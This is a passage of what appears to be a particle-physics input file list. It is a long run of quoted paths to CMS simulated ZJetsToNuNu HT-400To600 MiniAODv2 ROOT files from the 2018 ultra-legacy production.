'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B313590B-EBA6-0A4F-88EA-E1F853507331.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B56BDFBE-8653-D548-A011-A9D162C143B9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B61F9C08-AC52-1B4A-A2D0-49E4F8ECF791.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B7E478F8-A3AA-1941-8377-AFF00ABA84F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/BC0181F1-6613-A346-9184-2C9B57992CB0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/BCDC363F-B093-5B43-B923-D69AAE220340.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/C2254CB6-37FE-E34B-BCC0-67A1A68B17D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/C7784292-1C17-8C4A-9DF4-F0AACBA746FD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CBA8082C-6E2B-9D4E-8B09-DDEE91702E7D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CBD9D58F-73E7-7A44-BFDD-136692899BFA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CF511BAA-ADDC-9148-A192-51CD44443E04.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D1E5C7E6-0374-BA4C-AF79-9EE58AAE5DFB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D914AF19-2FDA-9F40-B1DF-12084ADFD6BF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D944E231-B179-3445-8C1B-1ED18D99A51F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/DE8527B5-9829-4440-9971-4002EE2F04C3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E3ABB170-59DE-A349-821B-C55820D215D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E6AD6204-7ED2-4F46-BBCF-C49D5553241D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E7DF61FF-2D2B-414D-87DC-FE90DE0996DA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F1DB09B4-4B49-BA4A-BD2F-95D0480EB4C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F24DD105-F540-6D49-B7EB-934B445ED02B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F2CD6353-D4C5-644E-8D98-C57140593E34.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FBC3A5BB-0970-934A-9767-B8AEF7EB96EA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FCA27572-EE13-294B-95DB-70430497C449.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FF9E25A8-A396-0241-98A9-8B1B658FB399.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0C4F2C97-1D83-3E4B-9E2E-B1B31A6FB565.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0E71367A-8E6A-3540-9A43-2BC68BB51D4F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0E7E0FBE-C39A-1349-82D7-2627C10672B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0F5DE692-B5C0-ED43-A81A-379B82AC7977.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1C312DFE-0AB9-7046-B308-D08590669885.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1D38AF48-2532-214C-A7A0-2C4E8439FBA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1DE9BFBF-5161-2046-988E-04FFD950B70C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/23D075B5-010B-0944-9FF1-7BDCACF24826.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/2795EA75-A07F-274D-8506-850FBDC9EB57.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/31A0E971-A3BD-DB4E-AC2A-D5B071D7F879.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/34BA6E70-370F-594C-9EF0-F9AD00F6BC3D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/393AF089-BFEA-484C-ABA1-D33972F5B5E1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/394B0CF2-E1DE-E24B-B6E7-F80C6960D939.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/3B3D546D-E33D-EA4C-913A-017CEF96CD00.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/41997A52-64D7-4745-95C0-C446922874BC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/4BAD0335-F4EE-D644-8FED-74D5F8EFD75B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/4E8999BF-37FF-874B-96B5-70F4E0B382A6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/512C9AE5-9078-2F4E-9926-EA1F7E45C16D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/51A7CB76-1FFB-EA42-A635-245CC1E81324.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/593D5659-4844-F442-AD36-2F10DA27D087.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/5BE74E9F-1F97-9B4B-9DA0-F8514E664749.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/6468759F-F6BD-6743-91ED-969EF3945F87.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/688F0438-EBF9-8344-938B-7B1335F8D59F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/69D51251-9ED8-D347-B72C-E8D750FC7A6B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/70BEDD19-622C-2B4B-9D22-B3B08DA93E0A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/71398763-343D-EE40-A694-CFC178AFAC97.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/71F98765-7E1A-3440-89E7-A91EA0148E0A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/7434363D-50FC-2B4C-AB96-F21963DE1E4E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/75920CA6-4B92-B44A-B863-74B76A286289.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/79294D7C-E575-2544-825D-924C886E88D4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/79DC0C7B-4896-BD4D-8BD8-91EE878D62CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/7BE83BB1-6EF3-774E-A8B9-F0150BF8AA6D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8914A8D6-0796-3D43-B05C-EE4AAF81F68F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8A94200B-C0AC-294E-8084-D11A13BE79CE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8FEEC1B8-D546-984F-8216-2C1DBF7BB5C5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/9100725F-0AEA-8540-A182-218411CF1230.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/9D371EC5-8FB1-6C40-854B-583C1E0C9648.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A181E602-4342-4740-9D8E-0366607F00C0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A315B281-65AE-DA45-A6FE-DAA1680C4657.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A8DA9CE8-B014-1444-8297-DE3FCC0F166B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A9E5249D-1B05-DE45-AAF1-47898BC1B63C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/AE8EE6DC-1E20-5C4B-B51F-D0AEB249E11A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/BDE4B218-E1F2-CA40-9A28-6512D66B4D16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/BFFC2526-47D5-E242-B2CB-A09034672062.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C00FC51D-9447-834B-BDC3-96F5FE24A61A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C180F591-1BD6-B941-A1D8-D44A17FDC347.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C1FA7C8B-5D15-344A-82DE-9BC30EF30DF1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C2E1CD6A-1882-4F49-BEEF-437969309E3C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/CA2EAFB4-AF05-1B4C-853F-2BFC4DB5855B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/CC6F26B4-3752-0242-BCD1-62A66B537642.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/D1398B3E-F697-F748-BE90-AFC4D6B63F82.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/E3282A7D-9204-D34A-84E6-11E9757DD26E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/F48AB845-AF8B-7341-967C-BB59F3B0553C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/F787D077-B36D-1C4E-80D7-472C2CFB0EAF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00292BC3-D291-4D41-8274-0E83F4A14B81.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00459626-7FF2-C44D-A77B-B1F13FCD0B16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00BDED3B-8FA4-D542-BD0E-6DE95B03E843.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00D29CF5-D763-7E48-A31E-E517BC6CFDE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/01044271-ED92-FE4B-99ED-1E4D77E447E7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/026D70C6-FB5A-C84F-A047-9F53D3242D00.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/036D66DB-C20B-7440-9A49-5E258CB7CAE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/072EF151-32A7-FF4B-8E0C-D1BB38D0B598.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0769AA29-D9AF-3E4F-8D13-5FCA2447B9A8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09004E0F-2CE5-D044-AA9C-35C5D4251838.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0984131D-854D-BF47-ADA9-B99DFDA0C579.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09AC3698-5E92-CD43-A27B-489AF42BAE76.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09E625E9-0F13-9C48-B2CA-5DB799F3D3A7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0AE66993-9E07-064F-AA0B-56DD6A9A8F7C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0B083FC8-8F29-6D4A-B2BF-437CA351999B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D5B95A9-2136-FA4A-A198-72A51E68BEE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D6A0DB0-EB21-BB4C-A8FA-F7FFD55A04E2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D84CE67-EB66-AB47-B47C-160D74DF8C77.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0DE6F1A5-0EEE-9447-87FB-6C8F7AF9C9C7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0E353CBD-A6D9-8B43-85D4-22FEF9FEB8E6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0F8D2C15-D04B-CF40-A1A1-5D5F7FA8529C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0FEB441E-2C29-4E4E-81D1-7AB0B9EF1918.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1064CAB8-E284-9C47-B62D-261757F140C3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/12697F3F-448A-D840-BA6F-FC6B3B5CD227.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/12773CCC-7E4D-AA47-BBE4-BE927E373C18.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/13A079B2-D149-6B45-8B3E-D8A615F7A493.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1454ACE8-199A-8249-B608-7D0CCE048518.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/14821BDC-775B-7441-AAD4-2BD23B70CD57.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/168B7C09-0083-5A48-A7DC-5E64E215C9F9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/172E3763-058A-6047-9E52-EFD76D8C1D82.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/18304A30-383A-9E47-88A0-7FD1E2E6320C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/1852CC73-29E6-194B-A910-8F96DB3F944A.root',
